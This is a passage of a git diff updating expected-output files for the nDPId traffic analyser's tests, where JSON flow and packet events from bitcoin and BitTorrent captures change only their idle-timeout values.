-00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":161,"flow_first_seen":1301328472925,"flow_last_seen":1301329809936,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":104984,"flow_avg_l4_payload_len":652,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1301327937725,"flow_last_seen":1301327939000,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22190,"flow_avg_l4_payload_len":1167,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":139,"flow_first_seen":1301328089970,"flow_last_seen":1301328420526,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":182136,"flow_avg_l4_payload_len":1310,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":172,"flow_first_seen":1301328319392,"flow_last_seen":1301329810648,"flow_idle_time":7560000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":152141,"flow_avg_l4_payload_len":884,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":119,"flow_first_seen":1301328699728,"flow_last_seen":1301329807659,"flow_idle_time":7560000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":74897,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1301329304767,"flow_last_seen":1301329810839,"flow_idle_time":7560000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1061,"flow_tot_l4_payload_len":2684,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":161,"flow_first_seen":1301328472925,"flow_last_seen":1301329809936,"flow_idle_time":7560000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":104984,"flow_avg_l4_payload_len":652,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1301327937725,"flow_last_seen":1301327939000,"flow_idle_time":7560000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22190,"flow_avg_l4_payload_len":1167,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":139,"flow_first_seen":1301328089970,"flow_last_seen":1301328420526,"flow_idle_time":7560000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":182136,"flow_avg_l4_payload_len":1310,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","packets-captured":637,"packets-processed":637,"total-skipped-flows":0,"total-l4-data-len":539032,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":42,"global_ts_msec":1301329810839} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 637/637 diff --git a/test/results/bittorrent.pcap.out b/test/results/bittorrent.pcap.out index b410479b8..532e98b75 100644 --- a/test/results/bittorrent.pcap.out +++ b/test/results/bittorrent.pcap.out 
@@ -1,136 +1,136 @@ 00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"bittorrent.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1455469967246} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967246,"flow_last_seen":1455469967246,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967246,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1455469967246,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469967246,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4eD1AAEAGAADAqAEDUjrYc86YlaHFzANOp3OTAoAY\/\/\/swwAAAQEIChnb8BkAhEMxE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjhgayboXmHFSZj4="} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967246,"flow_last_seen":1455469967246,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967246,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 
-01344{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1455469967465,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":624,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":624,"pkt_l4_len":590,"thread_ts_msec":1455469967465,"pkt":"xCwDBkn+LFbcjDU0CABFAAJiKFpAAHUG7uJSOthzwKgBA5Whzpinc5NTxcwDkoAZ\/SDtQgAAAQEICgCEQ0UZ2\/AZNDppcHY0NDpSOthzMTI6Y29tcGxldGVfYWdvaTllMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGkzODMwNWU0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI4ODhlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/7\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/9\/b\/v\/\/\/\/\/\/\/\/\/+\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/+\/3\/9\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/++\/\/\/\/\/\/\/\/\/3\/\/\/9\/\/\/\/f\/9\/\/\/\/\/9\/\/\/\/\/7\/\/\/\/\/\/\/v\/\/7\/\/\/\/+AAAAABQQAAAJlAAAABQQAAALYAAAABQQAAAB+AAAABQQAAACJAAAABQQAAAE5AAAABQQAAAARAAAABQQAAAK+AAAABQQAAAMvAAAABQQAAAKkAAAABQQAAAGlAAAABQQAAADmAAAABQQAAAHxAAAABQQAAANdAAAABQQAAABXAAAABQQAAADTAAAABQQAAANxAAAABQQAAAJrAAAABQQAAACTAAAABQQAAAFjAAAABQQAAALoAAAABQQAAACGAAAABQQAAAG8AAAABQQAAAMMAAAABQQAAAGu"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967550,"flow_last_seen":1455469967550,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967550,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1455469967550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469967550,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4KZJAAEAGAADAqAEDUjlhU86Xz5EMkOfxIylUooAY70J1ogAAAQEIChnb8UUAFHnUE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjhJMcBHQL4ndrvA="} -00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967550,"flow_last_seen":1455469967550,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967550,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 
-00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1455469967858,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":178,"pkt_l4_len":144,"thread_ts_msec":1455469967858,"pkt":"xCwDBkn+LFbcjDU0CABFAACkC49AAHcGgo1SOWFTwKgBA8+RzpcjKVSiDJDoNYAYAQJHBAAAAQEICgAUefwZ2\/FFE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wornNx4q0nl1XkqQAAADnFABkMTplaTBlNDppcHY0NDpSOWFTMTI6Y29tcGxldGVfYWdvaTNlMQ=="} -01304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1455469968002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":593,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":593,"pkt_l4_len":559,"thread_ts_msec":1455469968002,"pkt":"xCwDBkn+LFbcjDU0CABFAAJDC5FAAHcGgOxSOWFTwKgBA8+RzpcjKVUSDJDoNYAZAQLSoQAAAQEICgAUef4Z2\/FFOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTUzMTM3ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1Mjg4N2U2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/7\/\/93\/\/\/\/\/\/\/\/\/\/\/+f\/\/\/\/\/7\/\/\/3\/\/\/\/\/\/\/\/v\/\/\/v\/+\/\/3\/\/\/\/\/9\/\/\/\/\/\/1\/\/\/f\/\/v9\/\/\/\/\/\/\/\/\/91\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAtIAAAAFBAAAAngAAAAFBAAAAeYAAAAFBAAAAUUAAAAFBAAAAskAAAAFBAAAAGcAAAAFBAAAArYAAAAFBAAAAVgAAAAFBAAAAQEAAAAFBAAAAjMAAAAFBAAAAqAAAAAFBAAAAMoAAAAFBAAAAxIAAAAFBAAAAlIAAAAFBAAAAc8AAAAFBAAAAkMAAAAFBAAAAagAAAAFBAAAAhsAAAAFBAAAAzgAAAAFBAAAAacAAAAFBAAAAxQAAAAFBAAAAw4AAAAFBAAAAVwAAAAFBAAAAqI="} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969259,"flow_last_seen":1455469969259,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969259,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1455469969259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469969259,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4K5tAAEAGAADAqAEDU9i48c6fyNXli2jySWt7B4AYK\/LO3wAAAQEIChnb9+x4G0bsE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjvi3q9Fc8jVIrp0="} -00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969259,"flow_last_seen":1455469969259,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969259,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 
-00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1455469969318,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":148,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":148,"pkt_l4_len":114,"thread_ts_msec":1455469969318,"pkt":"xCwDBkn+LFbcjDU0CABFYACGozdAADIG1mVT2LjxwKgBA8jVzp9Ja3sH5YtpNoAYECl7XAAAAQEICngbRx8Z2\/fsE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMTg4Qi2qniMLxLorRFP2hZAAAAEAFABkMTplaTBlNA=="} -01379{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1455469969391,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":648,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":648,"pkt_l4_len":614,"thread_ts_msec":1455469969391,"pkt":"xCwDBkn+LFbcjDU0CABFYAJ6SOJAADIGLsdT2LjxwKgBA8jVzp9Ja3tZ5YtpNoAYECl87wAAAQEICngbR0YZ2\/gmOmlwdjQ0OlPYuPE0OmlwdjYxNjr+gAAAAAAAAOoGiP\/+zfQTMTI6Y29tcGxldGVfYWdvaTFlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGk1MTQxM2U0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAxLjguODI6eXBpNTI4OTVlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/3\/\/\/\/\/7\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/b\/\/\/f\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/9\/\/\/\/7\/\/\/\/\/\/\/99\/\/\/\/\/\/3\/\/97\/v\/\/\/\/\/9\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f\/\/\/\/\/\/7\/\/\/X\/\/\/\/9\/\/+AAAAABQQAAAG6AAAABQQAAAITAAAABQQAAAHTAAAABQQAAAA1AAAABQQAAAAQAAAABQQAAAHdAAAABQQAAAMaAAAABQQAAAE+AAAABQQAAANHAAAABQQAAAN+AAAABQQAAAIEAAAABQQAAAHOAAAABQQAAAGSAAAABQQAAAC8AAAABQQAAANcAAAABQQAAAGMAAAABQQAAABAAAAABQQAAAFbAAAABQQAAAEBAAAABQQAAACdAAAABQQAAADUAAAABQQAAAC\/AAAABQQAAAKPAAAABQQAAANe"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469969441,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4XbBAAEAGAADAqAEDTzXkAs6gOSOymifHI+P1WoAYmwf1TQAAAQEIChnb+J8AAH2QE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjqb8v2rPEXkzqd0="} -00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": 
{"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469969441,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4duZAAEAGAADAqAEDeD4h8c6emaQxnKbPGdPY9oAYmwdcRQAAAQEIChnb+J8AQ+diE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjsdMZTLXvd5m7DE="} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI 
